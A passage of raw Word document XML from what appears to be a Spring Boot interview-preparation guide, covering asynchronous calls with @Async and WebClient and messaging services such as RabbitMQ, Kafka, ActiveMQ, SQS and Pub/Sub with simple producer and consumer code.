          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B14207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tMapping("/callOtherApp")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E30CC"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ring triggerAsyncCall() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12EB88"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restClientService.callAnotherAppAsynchronously();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2B00D"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888AEED"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3EAB8986"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6. Add WebClient Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7A1D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o use WebClient, you need to configure it in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698658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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B131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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98B55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web.reactive.function.client.WebClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1071D633" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A33253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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17277BC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WebClientConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C48889" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB6EAA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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54DE4F"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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E16E38"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WebClient.builder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E150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0988F68D"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6672668"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Approach 2: Asynchronous Communication Using Messaging (e.g., RabbitMQ or Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3963E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For a more scalable and decoupled solution, you can use a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message broker</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to communicate asynchronously between two Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAAC5A"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Set up a Message Broker (e.g., RabbitMQ or Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672AFD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t up RabbitMQ or Kafka on your local machine or in the cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0BF51"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stall the necessary Spring dependencies for RabbitMQ/Kafka in your pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487C0F"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 For RabbitMQ --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC528C"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07878B8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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76002BC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spring-boot-starter-amqp&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D6A67"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5507F943" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF2655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 For Kafka --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725B66F"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0CD48A48"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org.springframework.kafka&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9AA5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spring-kafka&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398E907"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7C30A36E"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Producer Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FAB6C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producer application sends messages to the queue (e.g., RabbitMQ or Kafka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D421DCC"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amqp.rabbit.core.RabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DF58C"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1741DEEB"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551195CB" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAC5DF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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DC909"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MessageProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21364539" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0A653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3BD9A9BA"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RabbitTemplate rabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285107A2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479E9B22"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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2338E"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abbitTemplate.convertAndSend("queueName", message); // Send to queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11709E03"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286AA13F"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1DB8C4A8"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Consumer Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D218B"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consumer application listens for messages from the queue and processes them asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCBA6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amqp.rabbit.annotation.RabbitListener;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E799EC"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pringframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108B56B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7624BD08"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A74E326"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MessageConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B23C2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D7CC88"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abbitListener(queues = "queueName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE250B"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receiveMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FF435"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Process the message asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F86D98"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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42913FFA"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595038E7"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75A3E303" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48D5EA"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For simple asynchronous calls, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Async</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for non-blocking HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443342C"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For scalable, decoupled communication between services, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for messaging-based communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41353E5F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A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Both approaches help achieve asynchronous communication between two Spring Boot applications depending on the scale and needs of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BB12A" w14:textId="6A2AF368"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9B61AB2">
          <v:rect id="_x0000_i2686" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E1E50" w14:textId="7B983812" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF32B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="651" w:name="_Toc196308131"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you worked messaging services</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="651"/>
    </w:p>
    <w:p w14:paraId="66543BAE" w14:textId="7747B85F" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37"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es, I can help explain messaging services and their use in various architectures. Messaging services play a crucial role in distributed systems, where they facilitate communication between different microservices or components in an asynchronous manner. Some of the most common messaging systems used in Spring Boot applications are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48827334" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A686F"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abbitMQ is a message broker that implements the Advanced Message Queuing Protocol (AMQP). It helps in decoupling application components by providing a reliable message queue system. With RabbitMQ, one service can send a message to a queue, and another service can consume the message asynchronously. It supports features like message acknowledgment, retries, and message durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD53C4D"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for event-driven architectures, background job processing, or decoupling services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76FE83"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ring Boot Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use Spring AMQP for integrating RabbitMQ with Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060EA556"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7AE97B20"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25853D"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MessageProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7576DD" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015DBFE0"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0496A1B6"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RabbitTemplate rabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6727A" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55226980"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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24363060"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abbitTemplate.convertAndSend("myQueue", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA9F00"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CE2B1D2"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FCC9190"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F93E11"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MessageConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEFC94" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BC6A8B"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abbitListener(queues = "myQueue")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075039DB"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receiveMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC834A4"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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A984641"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7ECBFACF"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7261D72D" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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Apache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88BC7B"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Kafka is a distributed streaming platform that is used to handle high-throughput, fault-tolerant messaging. It works by maintaining a log of messages that can be read by multiple consumers at their own pace. Kafka is suitable for applications that need to process a high volume of events in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB37A26"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Real-time data streaming, event sourcing, and log aggregation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5661D7E0"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ring Boot Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Kafka provides easy-to-use integration with Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A37E93"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553B8AD8"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A5836"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KafkaProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726F500" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C91AB42"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 xml:space="preserve">    @Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63EDE5"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KafkaTemplate&lt;String, String&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA7230" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEB68FC"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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E278BAC"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kafkaTemplate.send("myTopic", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2636B3"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1B0D5C8D"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AA459DF"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E18B93F"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KafkaConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55877BAE" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A09B3A"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KafkaListener(topics = "myTopic", groupId = "group_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FD1D1"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listen(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D11F49"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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9FD9F"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5273AF40"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3B171912" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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ActiveMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002993D2"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ctiveMQ is another popular message broker that supports multiple messaging protocols like JMS, MQTT, and AMQP. It allows asynchronous messaging between distributed systems or components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56188F51"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for enterprise integration patterns and asynchronous messaging in Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F00D4"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ring Boot Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring provides integration with ActiveMQ via spring-boot-starter-activemq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F842F"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494EB745"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD9B4BF"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ActiveMQProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7E5B2" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56339D21"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151FCF10"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JmsTemplate jmsTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005744A6" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF151BF"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sendMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9E420"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jmsTemplate.convertAndSend("myQueue", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411A2C1"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039D74CC"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A966FCE"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C066F"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ActiveMQConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F8692" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFA7C5B"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JmsListener(destination = "myQueue")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81AFC9"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receiveMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33418E42"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ystem.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB4474"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667E051B"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0B96DD77" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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4. Amazon SQS (Simple Queue Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BACCFD"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mazon SQS is a fully managed message queuing service that can be used for message-oriented middleware. It allows you to decouple application components that are distributed across multiple servers or regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56C692"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e Case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for cloud-native applications that require message queuing and asynchronous processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0CC5E0"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ring Boot Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Cloud AWS or Spring Cloud Messaging provides integration with SQS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0FFF5C" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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5. Google Pub/Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC45639"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oogle Cloud Pub/Sub is a messaging service that allows you to send and receive messages between independent applications. It is highly scalable and ideal for event-driven architectures in the cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C8E76"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e Case</w:t>
